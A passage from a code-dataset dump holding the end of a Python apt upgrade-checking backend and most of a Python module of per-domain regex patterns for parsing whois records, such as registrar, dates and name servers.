apt.Cache()\n cache.update()\n cache.open(None)\n cache.upgrade( dist_upgrade=True )\n upgrades = cache.get_changes()\n cache.close()\n for pkg in upgrades:\n up = AptUpgrade(pkg)\n self.setUpgradeImportant( up )\n self.upgrades.append( up )\n return self.upgrades\n \n def getStats( self ):\n stats = {\"upgrades\":0, \"downgrades\":0, \"installs\":0, \"deletions\":0, \"download_size\":0, \"installed_size\":0, \"curr_installed_size\":0 }\n for upgrade in self.upgrades:\n pkg = upgrade.pkg\n if pkg.marked_upgrade:\n stats[\"upgrades\"] += 1\n elif pkg.marked_downgrade:\n stats[\"downgrades\"] += 1\n elif pkg.marked_install:\n stats[\"installs\"] += 1\n elif pkg.marked_delete:\n stats[\"deletions\"] += 1\n if pkg.candidate != None:\n stats[\"download_size\"] += pkg.candidate.size\n stats[\"installed_size\"] += pkg.candidate.installed_size\n if pkg.installed != None:\n stats[\"curr_installed_size\"] += pkg.installed.installed_size\n return stats\n\n def setUpgradeImportant( self, up ):\n up.isImportant = self.isPackageImportant( up.package )\n","repo_name":"ObviusOwl/check_apt_updates","sub_path":"os_updates/pm_backends/apt_backend.py","file_name":"apt_backend.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74912157807","text":"# pylint: disable=C0302\nimport os\nimport logging\n\nfrom typing import (\n Dict,\n Any,\n # Callable,\n)\n\nfrom .finders import (\n newLineSplit,\n R,\n findFromToAndLookFor,\n findFromToAndLookForWithFindFirst,\n findInSplitedLookForHavingFindFirst,\n)\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\n# 2023-09-03 mboot, all _items are inherited, confirmed\n# only _ as meta domains do net end up in the database\n\n# ======================================\n# Interesting for future enhancements:\n# https://github.com/rfc1036/whois/blob/next/tld_serv_list\n# https://github.com/rfc1036/whois/blob/next/new_gtlds_list\n# seems the most up to date and maintained\n\n\ndef xStr(what: str, times: int = 1, firstMandatory: bool = True) -> str:\n # =================================================================\n # Often we want to repeat regex patterns,\n # ( typically with nameservers or status fields )\n # that becomes unreadable very fast.\n # Allow for a simplification that expands on usage and\n # allow forcing the first to be mandatory as default,\n # but overridable when needed\n\n if times < 
1:\n        return \"\"\n\n    if firstMandatory and what[-1] == \"?\":\n        return what[:-1] + (what * (times - 1))\n\n    return what * times\n\n\n# =================================================================\n# The database\n# When we finally apply the regexes we use IGNORE CASE always on all matches\n\nZZ: Dict[str, Any] = {}\n\n# ======================================\n# meta registrars start with _ are only used as a common tool to define others\n# NOTE: _server is not inherited downstream, currently\n\nZZ[\"_privateReg\"] = {\"_privateRegistry\": True}\n\nZZ[\"_teleinfo\"] = {\"extend\": \"com\", \"_server\": \"whois.teleinfo.cn\"} # updated all downstream\n\nZZ[\"_uniregistry\"] = {\"extend\": \"com\", \"_server\": \"whois.uniregistry.net\"} # updated all downstream\n\nZZ[\"_donuts\"] = {\n    \"extend\": \"com\",\n    \"_server\": \"whois.donuts.co\",\n    \"registrant\": R(r\"Registrant Organization:\\s?(.+)\"),\n    \"status\": R(r\"Domain Status:\\s?(.+)\"),\n} # updated all downstream\n\nZZ[\"_centralnic\"] = {\n    \"extend\": \"com\",\n    \"_server\": \"whois.centralnic.com\",\n    \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n    \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n    \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n    \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n    \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n    \"status\": R(r\"Domain Status:\\s?(.+)\"),\n} # updated all downstream\n\nZZ[\"_gtldKnet\"] = {\n    \"extend\": \"com\",\n    \"_server\": \"whois.gtld.knet.cn\",\n    \"admin\": R(r\"Admin\\s*Name:\\s+(.+)\"),\n    \"_test\": None,\n} # updated all downstream\n\n# ======================================\n# start of regular entries, simple domains are at the end\n\nZZ[\"com\"] = {\n    \"domain_name\": R(r\"Domain Name\\s*:\\s*(.+)\"),\n    \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n    \"registrant\": R(r\"Registrant\\s*Organi(?:s|z)ation:([^\\n]*)\"),\n    \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n    \"creation_date\": R(r\"Creation Date:[ \\t]*([^\\n]*)\"),\n    \"expiration_date\": R(r\"(?:Expiry|Expiration) Date:[ \\t]*([^\\n]*)\"),\n    \"updated_date\": R(r\"Updated Date:[\\t ]*([^\\n]*)\"),\n    \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n    \"status\": R(r\"Status:\\s?(.+)\"),\n    \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n    \"_test\": \"google.com\",\n}\n\n# United Kingdom - academic sub-domain\nZZ[\"ac.uk\"] = {\n    \"extend\": \"uk\",\n    \"domain_name\": R(r\"Domain:\\n\\s?(.+)\"),\n    \"owner\": R(r\"Domain Owner:\\n\\s?(.+)\"),\n    \"registrar\": R(r\"Registered By:\\n\\s?(.+)\"),\n    \"registrant\": R(r\"Registered Contact:\\n\\s*(.+)\"),\n    \"expiration_date\": R(r\"Renewal date:\\n\\s*(.+)\"),\n    \"updated_date\": R(r\"Entry updated:\\n\\s*(.+)\"),\n    \"creation_date\": R(r\"Entry created:\\n\\s?(.+)\"),\n    \"name_servers\": R(r\"Servers:\\s*(.+)\\t\\n\\s*(.+)\\t\\n\"),\n    \"_test\": \"imperial.ac.uk\",\n}\n\nZZ[\"co.uk\"] = {\n    \"extend\": \"uk\",\n    \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n    \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n    \"status\": R(r\"Registration status:\\s*(.+)\"),\n    \"creation_date\": R(r\"Registered on:(.+)\"),\n    \"expiration_date\": R(r\"Expiry date:(.+)\"),\n    \"updated_date\": R(r\"Last updated:(.+)\"),\n    \"owner\": R(r\"Domain Owner:\\s+(.+)\"),\n    \"registrant\": R(r\"Registrant:\\n\\s+(.+)\"),\n    \"_test\": \"livedns.co.uk\",\n}\n\n# Armenia\nZZ[\"am\"] = {\n    \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n    \"_server\": \"whois.amnic.net\",\n    \"status\": R(r\"Status:\\s(.+)\"),\n    \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n    
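# illustrative note: the name_servers pattern below is built with xStr(); with\n    # firstMandatory=True the first repetition drops its trailing \"?\", so\n    # xStr(r\"(?:\\s+(\\S+)\\n)?\", 4) expands to\n    # r\"(?:\\s+(\\S+)\\n)(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?\"\n    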
\"registrant\": R(r\"Registrant:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant:\\n.+\\n.+\\n.+\\n\\s+(.+)\"),\n \"creation_date\": R(r\"Registered:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s+(.+)\"),\n \"updated_date\": R(r\"Last modified:\\s+(.+)\"),\n \"name_servers\": R(r\"DNS servers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 4)),\n \"_test\": \"amnic.net\",\n}\n\n# Amsterdam\nZZ[\"amsterdam\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.amsterdam\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": \"nic.amsterdam\",\n}\n\n# Argentina\nZZ[\"ar\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.ar\",\n \"domain_name\": R(r\"domain\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ar\",\n}\n\n# Austria\nZZ[\"at\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.at\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n extract=r\"organization:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n extract=r\"country:\\s*([^\\n]*)\\n\",\n ),\n \"_test\": \"nic.at\",\n \"_split\": newLineSplit(),\n}\n\nZZ[\"ax\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.ax\",\n \"domain_name\": R(r\"domain\\.+:\\s*(\\S+)\"),\n \"registrar\": R(r\"registrar\\.+:\\s*(.+)\"),\n \"creation_date\": R(r\"created\\.+:\\s*(\\S+)\"),\n \"expiration_date\": R(r\"expires\\.+:\\s*(\\S+)\"),\n \"updated_date\": R(r\"modified\\.+:\\s?(\\S+)\"),\n \"name_servers\": R(r\"nserver\\.+:\\s*(\\S+)\"),\n \"status\": R(r\"status\\.+:\\s*(\\S+)\"),\n \"registrant\": R(r\"Holder\\s+name\\.+:\\s*(.+)\\r?\\n\"), # not always present see meta.ax and google.ax\n \"registrant_country\": R(r\"country\\.+:\\s*(.+)\\r?\\n\"), # not always present see meta.ax and google.ax\n}\n\nZZ[\"bank\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n}\n\nZZ[\"be\"] = {\n \"extend\": \"pl\",\n \"domain_name\": R(r\"\\nDomain:\\s*(.+)\"),\n \"registrar\": R(r\"Company Name:\\n?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s*(.+)\\n\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameservers:(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?(?:\\n[ \\t]+(\\S+))?\\n\\n\"),\n}\n\nZZ[\"biz\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s?(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n 
\"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": None,\n}\n\nZZ[\"br\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.registro.br\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(\"nic.br\"),\n \"registrant\": None,\n \"owner\": R(r\"owner:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n \"_test\": \"registro.br\",\n}\n\nZZ[\"by\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"registrant\": R(r\"Org:\\s*(.+)\"),\n \"registrant_country\": R(r\"Country:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s*(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s*(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\\n\"),\n}\n\n# Brittany (French Territory)\nZZ[\"bzh\"] = {\n \"extend\": \"fr\",\n \"_server\": \"whois.nic.bzh\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s*(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s*(.*)\"),\n \"creation_date\": R(r\"Creation Date:\\s*(.*)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s*(.*)\"),\n \"updated_date\": R(r\"Updated Date:\\s*(.*)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.*)\"),\n \"status\": R(r\"Domain Status:\\s*(.*)\"),\n \"_test\": \"pik.bzh\",\n}\n\nZZ[\"cc\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"cl\"] = {\n \"extend\": \"com\",\n \"registrar\": R(\"nic.cl\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n}\n\nZZ[\"cn\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Sponsoring Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant:\\s?(.+)\"),\n \"creation_date\": R(r\"Registration Time:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Time:\\s?(.+)\"),\n}\n\nZZ[\"com.tr\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.trabis.gov.tr\",\n \"domain_name\": R(r\"\\*\\* Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Organization Name\\s+:\\s?(.+)\"),\n \"registrant\": R(r\"\\*\\* Registrant:\\s+?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created on\\.+:\\s?(.+).\"),\n \"expiration_date\": R(r\"Expires on\\.+:\\s?(.+).\"), # note the trailing . 
on both dates fields\n \"updated_date\": None,\n \"name_servers\": R(r\"\\*\\* Domain Servers:\\n(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?\"), # allow for ip addresses after the name server\n \"status\": None,\n \"_test\": \"google.com.tr\",\n}\n\nZZ[\"co.il\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"registrar\": R(r\"registrar name:\\s*(.+)\"),\n \"registrant\": None,\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": R(r\"validity:\\s*(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s*(.+)\"),\n}\n\nZZ[\"co.cz\"] = {\"extend\": \"cz\"}\nZZ[\"cz\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(\\S+)\"),\n \"status\": R(r\"status:\\s*(.+)\"),\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"de\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"updated_date\": R(r\"\\nChanged:\\s?(.+)\"),\n \"name_servers\": R(r\"Nserver:\\s*(.+)\"),\n}\n\n# Denmark\nZZ[\"dk\"] = {\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": None,\n \"registrant\": R(r\"Registrant\\s*Handle:\\s*\\w*\\s*Name:\\s?(.+)\"),\n \"registrant_country\": R(r\"Country:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Hostname:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": None,\n}\n\nZZ[\"edu\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"Registrant:\\s*(.+)\"),\n \"creation_date\": R(r\"Domain record activated:\\s?(.+)\"),\n \"updated_date\": R(r\"Domain record last updated:\\s?(.+)\"),\n \"expiration_date\": R(r\"Domain expires:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Servers:\\s?%s\" % xStr(r\"(?:\\t(.+)\\n)?\", 10)),\n \"_test\": \"rutgers.edu\",\n}\n\n# estonian\nZZ[\"ee\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\nname:\\s+(.+\\.ee)\\n\"),\n \"registrar\": R(r\"Registrar:\\nname:\\s+(.+)\\n\"),\n \"registrant\": R(r\"Registrant:\\nname:\\s+(.+)\\n\"),\n \"registrant_country\": R(r\"Registrant:(?:\\n+.+\\n*)*country:\\s+(.+)\\n\"),\n \"creation_date\": R(r\"Domain:(?:\\n+.+\\n*)*registered:\\s+(.+)\\n\"),\n \"expiration_date\": R(r\"Domain:(?:\\n+.+\\n*)*expire:\\s+(.+)\\n\"),\n \"updated_date\": R(r\"Domain:(?:\\n+.+\\n*)*changed:\\s+(.+)\\n\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"Domain:(?:\\n+.+\\n*)*status:\\s+(.+)\\n\"),\n}\n\nZZ[\"eu\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.eu\",\n \"registrar\": R(r\"Name:\\s?(.+)\"),\n \"domain_name\": R(r\"\\nDomain:\\s*(.+)\"),\n \"name_servers\": R(r\"Name servers:\\n(?:\\s+(\\S+)\\n)(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)\\n?\"),\n}\n\nZZ[\"fi\"] = {\n \"domain_name\": R(r\"domain\\.+:\\s?(.+)\"),\n \"registrar\": R(r\"registrar\\.+:\\s?(.+)\"),\n \"creation_date\": R(r\"created\\.+:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires\\.+:\\s?(.+)\"),\n 
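# the .fi whois pads its field labels with dots (e.g. \"expires...........:\"),\n    # which is why these patterns put \\.+ between each label and its colon\n    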
\"updated_date\": R(r\"modified\\.+:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver\\.+:\\s*(.+)\"),\n \"status\": R(r\"status\\.+:\\s?(.+)\"),\n \"registrant\": R(r\"Holder\\s*\\n\\s*name\\.*:\\s*([^\\n]*)\\n\"),\n \"registrant_country\": R(r\"\\ncountry\\.*:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"fr\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s*(.+)\"),\n # \"registrant\": R(r\"contact:\\s?(.+)\"),\n # \"registrant_organization\": R(r\"type:\\s+ORGANIZATION\\scontact:\\s+(.*)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-update:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n # \"registrant_country\": R(r\"Country:\\s?(.+)\"),\n \"_test\": \"sfr.fr\",\n \"registrant\": findFromToAndLookForWithFindFirst(\n findFirst=r\"holder-c:\\s*([^\\n]*)\\n\",\n fromStr=r\"nic-hdl:\\s*{}\\n\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"contact:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findFromToAndLookForWithFindFirst(\n findFirst=r\"holder-c:\\s*([^\\n]*)\\n\",\n fromStr=r\"nic-hdl:\\s*{}\\n\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"country:\\s*([^\\n]*)\\n\",\n ),\n}\n\n# Hong Kong\nZZ[\"hk\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.hkirc.hk\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar Name:\\s?(.+)\"),\n \"registrant\": R(r\"Company English Name.*:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Domain Name Commencement Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None,\n # name servers have trailing whitespace, lines are \\n only\n \"name_servers\": R(r\"Name Servers Information:\\s*(?:(\\S+)[ \\t]*\\n)(?:(\\S+)[ \\t]*\\n)?(?:(\\S+)[ \\t]*\\n)?(?:(\\S+)[ \\t]*\\n)?\"),\n \"status\": None,\n \"_test\": \"hkirc.hk\",\n}\n\nZZ[\"id\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Sponsoring Registrar Organization:\\s?(.+)\"),\n \"creation_date\": R(r\"Created On:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated On:\\s?(.+)$\"),\n}\n\nZZ[\"im\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"status\": None,\n \"registrar\": None,\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Name Server:(.+)\"),\n \"registrant\": R(r\"Domain Owners / Registrant\\s*\\n\\s*Name:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"ir\"] = {\n \"_server\": \"whois.nic.ir\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(\"nic.ir\"),\n \"registrant_country\": None,\n \"creation_date\": None,\n \"status\": None,\n \"expiration_date\": R(r\"expire-date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-updated:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ir\",\n}\n\nZZ[\"is\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.isnic.is\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": None,\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"nserver:\\s?(.+)\"),\n \"status\": None,\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n 
extract=r\"role:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n \"_test\": \"isnic.is\",\n}\n\nZZ[\"it\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar\\s*Organization:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant\\s*Organization:\\s*(.+)\"),\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expire Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Update:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameservers(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\n# The Japanese whois servers always return English unless a Japanese locale is specified in the user's LANG environmental variable.\n# See: https://www.computerhope.com/unix/uwhois.htm\n# Additionally, whois qeuries can explicitly request english:\n# To suppress Japanese output, add'/e' at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'.\n#\nZZ[\"jp\"] = {\n \"domain_name\": R(r\"\\[Domain Name\\]\\s?(.+)\"),\n \"registrar\": R(r\"\\[ (.+) database provides information on network administration. Its use is \\]\"),\n \"registrant\": R(r\"\\[Registrant\\]\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"\\[Created on\\]\\s?(.+)\"),\n \"expiration_date\": R(r\"\\[Expires on\\]\\s?(.+)\"),\n \"updated_date\": R(r\"\\[Last Updated\\]\\s?(.+)\"),\n \"name_servers\": R(r\"\\[Name Server\\]\\s*(.+)\"),\n \"status\": R(r\"\\[Status\\]\\s?(.+)\"),\n \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n}\n\nZZ[\"co.jp\"] = {\n \"extend\": \"jp\",\n \"creation_date\": R(r\"\\[Registered Date\\]([^\\n]*)\\n\"), # possibly use Connected date\n \"expiration_date\": None,\n \"updated_date\": R(r\"\\[Last Update\\]([^\\n]*)\\n\"),\n \"status\": R(r\"\\[State\\]\\s?(.+)\"),\n}\n\nZZ[\"kg\"] = {\n \"domain_name\": R(r\"Domain\\s+(\\S+)\"),\n \"registrar\": R(r\"Billing\\sContact:\\n.*\\n\\s+Name:\\s(.+)\\n\"),\n \"registrant_country\": None,\n \"expiration_date\": R(r\"Record expires on:\\s+(.+)\"),\n \"creation_date\": R(r\"Record created:\\s+(.+)\"),\n \"updated_date\": R(r\"Record last updated on:\\s+(.+)\"),\n \"name_servers\": R(r\"Name servers in the listed order:\\n\\n(?:(\\S+)[ \\t]*\\S*\\n)(?:(\\S+)[ \\t]*\\S*\\n)?(?:(\\S+)[ \\t]*\\S*\\n)?\\n\"),\n \"status\": R(r\"Domain\\s+\\S+\\s+\\((\\S+)\\)\"),\n \"registrant\": R(r\"Administrative\\sContact:\\n.*\\n\\s+Name:\\s(.+)\\n\"),\n}\n\nZZ[\"kr\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.kr\",\n \"domain_name\": R(r\"Domain Name\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"Authorized Agency\\s*:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant\\s*:\\s*(.+)\"),\n \"creation_date\": R(r\"Registered Date\\s*:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date\\s*:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated Date\\s*:\\s?(.+)\"),\n \"status\": R(r\"status\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"Host Name\\s+:\\s+(\\S+)\\n\"),\n}\n\nZZ[\"kz\"] = {\n \"domain_name\": R(r\"Domain name\\.+:\\s(.+)\"),\n \"registrar\": R(r\"Current Registar:\\s(.+)\"),\n \"registrant_country\": R(r\"Country\\.+:\\s?(.+)\"),\n \"expiration_date\": None,\n \"creation_date\": R(r\"Domain created:\\s(.+)\"),\n \"updated_date\": R(r\"Last modified :\\s(.+)\"),\n \"name_servers\": R(r\"ary server\\.+:\\s+(\\S+)\"),\n \"status\": R(r\"Domain status :(?:\\s+([^\\n]+)\\n)\"),\n \"registrant\": R(r\"Organization Using Domain Name\\s*\\n.*\\n\\s*Organization Name\\.*:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"lt\"] = {\n \"extend\": \"com\",\n 
\"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"\\nStatus:\\s?(.+)\"),\n}\n\nZZ[\"lv\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.lv\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"creation_date\": R(r\"Registered:\\s*(.+)\\n\"), # actually there seem to be no dates\n \"updated_date\": R(r\"Changed:\\s*(.+)\\n\"),\n \"expiration_date\": R(r\"paid-till:\\s*(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"_test\": \"nic.lv\",\n}\n\nZZ[\"me\"] = {\n \"extend\": \"biz\",\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None, # some entries have no date string but not always\n \"name_servers\": R(r\"Name Server:\\s*(\\S+)\\r?\\n\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n}\n\nZZ[\"ml\"] = {\n \"extend\": \"com\",\n \"domain_name\": 